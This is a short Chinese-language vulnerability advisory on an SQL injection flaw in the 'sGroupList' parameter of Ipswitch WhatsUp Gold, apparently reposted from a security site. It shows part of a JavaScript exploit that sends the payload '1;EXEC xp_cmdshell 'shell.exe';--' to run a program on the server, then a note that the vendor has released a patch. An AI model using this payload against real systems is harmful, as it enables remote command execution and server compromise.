Ipswitch WhatsUp Gold 'sGroupList'参数SQL注入漏洞(2)

getHtmlBody("/NmConsole/Reports/Workspace/Virtualization/WrVMwareHostList/WrVMwareHostList.asp?sGroupList=1;EXEC xp_cmdshell 'shell.exe';--");
}
else
{
    alert("Victim Exploited - not running attack again");
    //deleteCookie("mix0");
}

建议:
--------------------------------------------------------------------------------
厂商补丁:

Ipswitch
--------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:

内容版权声明:除非注明,否则皆为本站原创文章。

转载注明出处:https://www.heiqu.com/wyswsy.html